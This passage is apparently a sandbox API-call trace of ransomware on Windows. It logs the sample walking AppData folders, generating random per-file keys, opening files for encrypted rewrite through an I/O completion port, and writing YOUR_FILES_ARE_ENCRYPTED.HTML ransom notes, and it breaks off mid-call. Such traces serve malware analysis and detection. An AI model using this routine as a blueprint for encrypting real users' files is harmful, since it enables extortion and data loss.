[0110.894] lstrlenW (lpString=".log") returned 4 [0110.894] PathFindExtensionW (pszPath="USS.log") returned=".log" [0110.894] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\USS.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\unistoredb\\uss.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0110.895] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239c0dc2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x239c0dc2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239c0dc2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="USSres00001.jrs", cAlternateFileName="USSRES~1.JRS")) returned 1 [0110.895] StrStrIW (lpFirst="USSres00001.jrs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.895] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\USSres00001.jrs") returned 72 [0110.895] PathFindExtensionW (pszPath="USSres00001.jrs") returned=".jrs" [0110.895] lstrlenW (lpString=".jrs") returned 4 [0110.895] PathFindExtensionW (pszPath="USSres00001.jrs") returned=".jrs" [0110.895] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x239c0dc2, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x239c0dc2, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x239c0dc2, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="USSres00002.jrs", cAlternateFileName="USSRES~2.JRS")) returned 1 [0110.895] StrStrIW (lpFirst="USSres00002.jrs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.895] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\USSres00002.jrs") returned 72 [0110.895] PathFindExtensionW (pszPath="USSres00002.jrs") returned=".jrs" [0110.895] lstrlenW (lpString=".jrs") returned 4 [0110.895] PathFindExtensionW (pszPath="USSres00002.jrs") returned=".jrs" [0110.895] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2399ab8b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2399ab8b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xdd289e64, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="USStmp.log", cAlternateFileName="")) returned 1 [0110.895] StrStrIW (lpFirst="USStmp.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.895] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log") returned 67 [0110.895] PathFindExtensionW (pszPath="USStmp.log") returned=".log" [0110.895] lstrlenW (lpString=".log") returned 4 [0110.895] PathFindExtensionW (pszPath="USStmp.log") returned=".log" [0110.895] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0110.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\unistoredb\\usstmp.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0110.896] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=3145728) returned 1 [0110.896] GetProcessHeap () returned 0x600000 [0110.896] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0110.900] wsprintfW (in: param_1=0x19e3be, param_2="%02X" | out: param_1="1E") returned 2 [0110.900] wsprintfW (in: param_1=0x19e3c2, param_2="%02X" | out: param_1="A4") returned 2 [0110.900] wsprintfW (in: param_1=0x19e3c6, param_2="%02X" | out: param_1="8A") returned 2 [0110.900] wsprintfW (in: param_1=0x19e3ca, param_2="%02X" | out: param_1="96") returned 2 [0110.900] wsprintfW (in: param_1=0x19e3ce, param_2="%02X" | out: param_1="28") returned 2 [0110.900] wsprintfW (in: param_1=0x19e3d2, param_2="%02X" | out: param_1="68") returned 2 [0110.900] wsprintfW (in: param_1=0x19e3d6, param_2="%02X" | out: param_1="22") returned 2 [0110.900] wsprintfW (in: param_1=0x19e3da, param_2="%02X" | out: param_1="A5") returned 2 [0110.900] wsprintfW (in: param_1=0x19e3de, param_2="%02X" | out: param_1="52") returned 2 [0110.900] wsprintfW (in: param_1=0x19e3e2, param_2="%02X" | out: param_1="FB") returned 2 [0110.901] wsprintfW (in: param_1=0x19e3e6, param_2="%02X" | out: param_1="4F") returned 2 [0110.901] wsprintfW (in: param_1=0x19e3ea, param_2="%02X" | out: param_1="0B") returned 2 [0110.901] wsprintfW (in: param_1=0x19e3ee, param_2="%02X" | out: param_1="B2") returned 2 [0110.901] wsprintfW (in: param_1=0x19e3f2, param_2="%02X" | out: param_1="E9") returned 2 [0110.901] wsprintfW (in: param_1=0x19e3f6, param_2="%02X" | out: param_1="DE") returned 2 [0110.901] wsprintfW (in: param_1=0x19e3fa, param_2="%02X" | out: param_1="BC") returned 2 [0110.901] wsprintfW (in: param_1=0x19e3fe, param_2="%02X" | out: param_1="68") returned 2 [0110.901] wsprintfW (in: param_1=0x19e402, param_2="%02X" | out: param_1="EA") returned 2 [0110.901] wsprintfW (in: param_1=0x19e406, param_2="%02X" | out: param_1="71") returned 2 [0110.901] wsprintfW (in: param_1=0x19e40a, param_2="%02X" | out: param_1="9A") returned 2 [0110.901] wsprintfW (in: param_1=0x19e40e, param_2="%02X" | out: param_1="03") returned 2 [0110.901] wsprintfW (in: param_1=0x19e412, param_2="%02X" | out: param_1="7D") returned 2 [0110.901] wsprintfW (in: param_1=0x19e416, param_2="%02X" | out: param_1="25") returned 2 [0110.901] wsprintfW (in: param_1=0x19e41a, param_2="%02X" | out: param_1="0E") returned 2 [0110.901] wsprintfW (in: param_1=0x19e41e, param_2="%02X" | out: param_1="70") returned 2 [0110.901] wsprintfW (in: param_1=0x19e422, param_2="%02X" | out: param_1="F6") returned 2 [0110.901] wsprintfW (in: param_1=0x19e426, param_2="%02X" | out: param_1="34") returned 2 [0110.901] wsprintfW (in: param_1=0x19e42a, param_2="%02X" | out: param_1="36") returned 2 [0110.901] wsprintfW (in: param_1=0x19e42e, param_2="%02X" | out: param_1="2C") returned 2 [0110.901] wsprintfW (in: param_1=0x19e432, param_2="%02X" | out: param_1="CD") returned 2 [0110.901] wsprintfW (in: param_1=0x19e436, param_2="%02X" | out: param_1="9D") returned 2 [0110.901] wsprintfW (in: param_1=0x19e43a, param_2="%02X" | out: param_1="46") returned 2 [0110.902] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\USStmp.log" [0110.902] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0110.902] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0110.902] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2399ab8b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2399ab8b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xdd289e64, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0x63c418, dwReserved1=0x630690, cFileName="USStmp.log", cAlternateFileName="")) returned 0 [0110.902] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.902] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 86 [0110.902] GetProcessHeap () returned 0x600000 [0110.902] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\UnistoreDB\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\unistoredb\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0110.904] WriteFile (in: hFile=0x30c, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0110.905] CloseHandle (hObject=0x30c) returned 1 [0110.905] GetProcessHeap () returned 0x600000 [0110.905] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.905] GetProcessHeap () returned 0x600000 [0110.905] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.907] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x262a5092, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x262a5092, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="UnistoreDB", cAlternateFileName="UNISTO~1")) returned 0 [0110.907] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0110.907] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0110.907] GetProcessHeap () returned 0x600000 [0110.907] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\comms\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0110.908] WriteFile (in: hFile=0x308, lpBuffer=0x3183de0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3183de0*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0110.909] CloseHandle (hObject=0x308) returned 1 [0110.910] GetProcessHeap () returned 0x600000 [0110.910] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.910] GetProcessHeap () returned 0x600000 [0110.910] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.911] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="History", cAlternateFileName="")) returned 1 [0110.911] StrStrIW (lpFirst="History", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.911] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History") returned 47 [0110.911] GetProcessHeap () returned 0x600000 [0110.911] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.912] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History" [0110.912] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History\\*" [0110.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\History\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x262a5092, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x262a5092, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306d8, dwReserved1=0x630688, cFileName="UnistoreDB", cAlternateFileName="翿")) returned 0xffffffff [0110.912] GetProcessHeap () returned 0x600000 [0110.912] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.913] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xb1dfb94f, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xb1dfb94f, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x9111b8d4, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x461a, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0110.913] StrStrIW (lpFirst="IconCache.db", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.913] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db") returned 52 [0110.913] PathFindExtensionW (pszPath="IconCache.db") returned=".db" [0110.913] lstrlenW (lpString=".db") returned 3 [0110.913] PathFindExtensionW (pszPath="IconCache.db") returned=".db" [0110.913] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0110.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0110.913] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=17946) returned 1 [0110.913] GetProcessHeap () returned 0x600000 [0110.913] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x313b008 [0110.916] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="6C") returned 2 [0110.916] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="4E") returned 2 [0110.916] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="F3") returned 2 [0110.916] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="F6") returned 2 [0110.916] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="3A") returned 2 [0110.916] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="79") returned 2 [0110.916] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="FE") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="CF") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="84") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="1C") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="1D") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="43") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="2B") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="BD") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="D7") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="6F") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="26") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="07") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="7F") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="23") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="CD") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="EC") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="F3") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="9C") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="C9") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="8B") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="9F") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="61") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="90") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="C4") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="48") returned 2 [0110.916] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="6A") returned 2 [0110.917] lstrcpyW (in: lpString1=0x314b0bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\IconCache.db" [0110.917] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x313b008, NumberOfConcurrentThreads=0x0) returned 0x274 [0110.917] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x313b008, lpOverlapped=0x313b008) returned 1 [0110.917] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3a17d745, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a17d745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0110.917] StrStrIW (lpFirst="Microsoft", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.917] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft") returned 49 [0110.917] GetProcessHeap () returned 0x600000 [0110.917] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.918] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft" [0110.918] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\*" [0110.918] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3a17d745, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a17d745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0110.918] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3a17d745, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a17d745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="..", cAlternateFileName="")) returned 1 [0110.918] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5b2eec3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="CLR_v4.0", cAlternateFileName="")) returned 1 [0110.918] StrStrIW (lpFirst="CLR_v4.0", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.918] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0") returned 58 [0110.918] GetProcessHeap () returned 0x600000 [0110.918] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0110.919] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0" [0110.919] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\*" [0110.919] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\CLR_v4.0\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5b2eec3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0110.919] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5b2eec3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0110.919] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b2eec3b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x5b2eec3b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x5b2eec3b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="UsageLogs", cAlternateFileName="USAGEL~1")) returned 1 [0110.919] StrStrIW (lpFirst="UsageLogs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.919] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: 